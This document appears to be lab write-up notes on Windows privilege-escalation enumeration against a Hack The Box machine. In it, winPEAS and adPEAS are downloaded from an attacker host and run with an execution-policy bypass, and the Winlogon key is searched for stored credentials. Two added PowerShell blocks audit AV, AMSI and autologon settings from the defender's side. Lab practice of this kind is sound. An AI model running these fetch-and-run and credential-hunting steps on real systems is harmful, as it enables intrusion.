PEAS
ps c:\tmp> iwr -Uri http://10.10.14.7/winPEASx64.exe -Outfile C:\tmp\winPEASx64.exe
Delivery complete
ps c:\tmp> .\winPEASx64.exe log
"log" argument present, redirecting output to file "out.txt"
done
Because the PWSA cannot parse the output properly, I will redirect the output to a file and read it from Kali.
ENV
╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables
COMPUTERNAME: RESEARCH
PUBLIC: C:\Users\Public
LOCALAPPDATA: C:\Users\Sierra.Frye\AppData\Local
PSModulePath: C:\Users\Sierra.Frye\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PROCESSOR_ARCHITECTURE: AMD64
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\Sierra.Frye\AppData\Local\Microsoft\WindowsApps
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ProgramFiles(x86): C:\Program Files (x86)
PROCESSOR_LEVEL: 23
ProgramFiles: C:\Program Files
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
USERPROFILE: C:\Users\Sierra.Frye
SystemRoot: C:\Windows
ALLUSERSPROFILE: C:\ProgramData
DriverData: C:\Windows\System32\Drivers\DriverData
ProgramData: C:\ProgramData
PROCESSOR_REVISION: 3100
USERNAME: Sierra.Frye
CommonProgramW6432: C:\Program Files\Common Files
CommonProgramFiles: C:\Program Files\Common Files
OS: Windows_NT
PROCESSOR_IDENTIFIER: AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
ComSpec: C:\Windows\system32\cmd.exe
SystemDrive: C:
TEMP: C:\Users\SIERRA~1.FRY\AppData\Local\Temp
NUMBER_OF_PROCESSORS: 2
APPDATA: C:\Users\Sierra.Frye\AppData\Roaming
TMP: C:\Users\SIERRA~1.FRY\AppData\Local\Temp
ProgramW6432: C:\Program Files
windir: C:\Windows
USERDOMAIN: SEARCH
USERDNSDOMAIN: SEARCH.HTB
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables
ComSpec: C:\Windows\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\Windows\TEMP
TMP: C:\Windows\TEMP
USERNAME: SYSTEM
windir: C:\Windows
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 23
PROCESSOR_IDENTIFIER: AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
PROCESSOR_REVISION: 3100
LAPS
LSA Protection
Credentials Guard
Cached Creds
AV
PEAS claims that there is no AV, even though the adPEAS.ps1 script was blocked by AV (see the adPEAS section).
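The "no AV" verdict and the AMSI block are easy to reconcile by asking Defender directly instead of trusting a single tool check. The following is an added example, not code from the original notes or from the PEAS projects; Get-AvStatus is a hypothetical helper name, and the block assumes the built-in Defender PowerShell module is available on the host.

```powershell
# Added example (not part of the original notes): reconcile the "no AV" verdict
# with the AMSI block seen when importing adPEAS.ps1. Get-AvStatus is a
# hypothetical helper name; it assumes the built-in Defender module is present.
function Get-AvStatus {
    $result = [ordered]@{}

    # 1. root\SecurityCenter2 is what many enumeration tools query for AV
    #    products. It does not exist on Windows Server, so a tool relying on it
    #    alone reports no AV there even with Defender running.
    try {
        $sc = Get-CimInstance -Namespace 'root\SecurityCenter2' -ClassName AntiVirusProduct -ErrorAction Stop
        $result.SecurityCenterProducts = @($sc.displayName)
    } catch {
        $result.SecurityCenterProducts = "unavailable: $($_.Exception.Message)"
    }

    # 2. Ask Defender directly: service state plus engine/real-time flags.
    $svc = Get-Service -Name WinDefend -ErrorAction SilentlyContinue
    $result.WinDefendService = if ($svc) { [string]$svc.Status } else { 'not installed' }
    if (Get-Command Get-MpComputerStatus -ErrorAction SilentlyContinue) {
        $mp = Get-MpComputerStatus
        $result.AntivirusEnabled          = $mp.AntivirusEnabled
        $result.RealTimeProtectionEnabled = $mp.RealTimeProtectionEnabled
    }

    # 3. Registered AMSI providers. The ParserError "ScriptContainedMaliciousContent"
    #    in the adPEAS output is AMSI rejecting the script at parse time, so a
    #    populated list here explains the block regardless of what step 1 says.
    $providers = Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers' -ErrorAction SilentlyContinue
    $result.AmsiProviders = @(
        foreach ($p in $providers) {
            $clsid = $p.PSChildName
            $name  = (Get-ItemProperty "HKLM:\SOFTWARE\Classes\CLSID\$clsid" -ErrorAction SilentlyContinue).'(default)'
            if ($name) { "$name ($clsid)" } else { $clsid }
        }
    )

    [pscustomobject]$result
}

Get-AvStatus | Format-List
```

When SecurityCenterProducts comes back as unavailable while WinDefendService is Running and at least one AMSI provider is listed, the tool's "no AV" line is a detection gap in the tool, not an absence of protection on the host.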
UAC
PowerShell
PowerShell 5.1.17763.1
KrbRelayUp
NTLM
Defender
User Privileges (sierra.frye)
User privileges of the sierra.frye user have already been enumerated.
DA
The organization appears to plan to disable the administrator user.
AutoLogon
ps c:\tmp> cmd /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ SEARCH
DefaultUserName REG_SZ
DisableBackButton REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
userinit reg_sz c:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x2e7e54ca7
ShutdownFlags REG_DWORD 0x13
DisableLockWorkstation REG_DWORD 0x0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey
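The reg query above is what an auditor checks by hand for stored autologon credentials. The following is an added example, not code from the original notes or from the PEAS projects; Get-WinlogonAudit is a hypothetical helper name, and the block reads the same Winlogon key, reporting whether automatic logon is configured and whether a cleartext DefaultPassword value exists without echoing the password itself.

```powershell
# Added example (not part of the original notes): defender-side audit of the
# Winlogon key queried above. Reports whether automatic logon is configured and
# whether a cleartext DefaultPassword is stored, without echoing the password.
# Get-WinlogonAudit is a hypothetical helper name chosen for this example.
$WinlogonPath = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

function Get-WinlogonAudit {
    param([string]$Path = $WinlogonPath)

    $props = Get-ItemProperty -Path $Path -ErrorAction Stop
    $names = $props.PSObject.Properties.Name

    # AutoAdminLogon is a REG_SZ that holds "1" when automatic logon is on.
    # It is absent from the reg query output above, which is the healthy state.
    $autoLogon = ($names -contains 'AutoAdminLogon') -and ([string]$props.AutoAdminLogon -eq '1')

    # DefaultPassword is the cleartext value enumeration tools look for.
    # Caveat: Sysinternals Autologon writes it to an LSA secret instead, which a
    # plain registry read of this key will not reveal.
    $hasPassword = $names -contains 'DefaultPassword'

    if ($autoLogon -and $hasPassword) {
        $finding = 'Cleartext autologon password stored in Winlogon'
    } elseif ($autoLogon) {
        $finding = 'AutoAdminLogon enabled; password may be held as an LSA secret'
    } elseif ($hasPassword) {
        $finding = 'Stale DefaultPassword present although autologon is off'
    } else {
        $finding = 'No autologon configured'
    }

    [pscustomobject]@{
        AutoAdminLogon     = $autoLogon
        DefaultUserName    = $props.DefaultUserName
        DefaultDomainName  = $props.DefaultDomainName
        DefaultPasswordSet = $hasPassword
        CachedLogonsCount  = [int]$props.CachedLogonsCount   # 10 in the output above; relevant to the Cached Creds check
        Finding            = $finding
    }
}

Get-WinlogonAudit | Format-List
```

Against the values listed above, neither AutoAdminLogon nor DefaultPassword is present, so the result is "No autologon configured" with DefaultDomainName SEARCH, an empty DefaultUserName, and CachedLogonsCount 10.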
adPEAS
PS C:\tmp> iwr -Uri http://10.10.14.7/adPEAS.ps1 -Outfile C:\tmp\adPEAS.ps1
PS C:\tmp> powershell -ep bypass -nop -c "Import-Module C:\tmp\adPEAS.ps1 ; Invoke-adPEAS > C:\tmp\adPEAS_output.txt"
powershell : At C:\tmp\adPEAS.ps1:1 char:1
+ CategoryInfo : NotSpecified: (At C:\tmp\adPEAS.ps1:1 char:1:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
+ Function Invoke-adPEAS {
+ ~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
Invoke-adPEAS : The term 'Invoke-adPEAS' is not recognized as the name of a cmdlet, function,
script file, or operable program. Check the spelling of the name, or if a path was included,
verify that the path is correct and try again.
At line:1 char:35
+ Import-Module C:\tmp\adPEAS.ps1 ; Invoke-adPEAS > C:\tmp\adPEAS_outpu ...
+ ~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Invoke-adPEAS:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException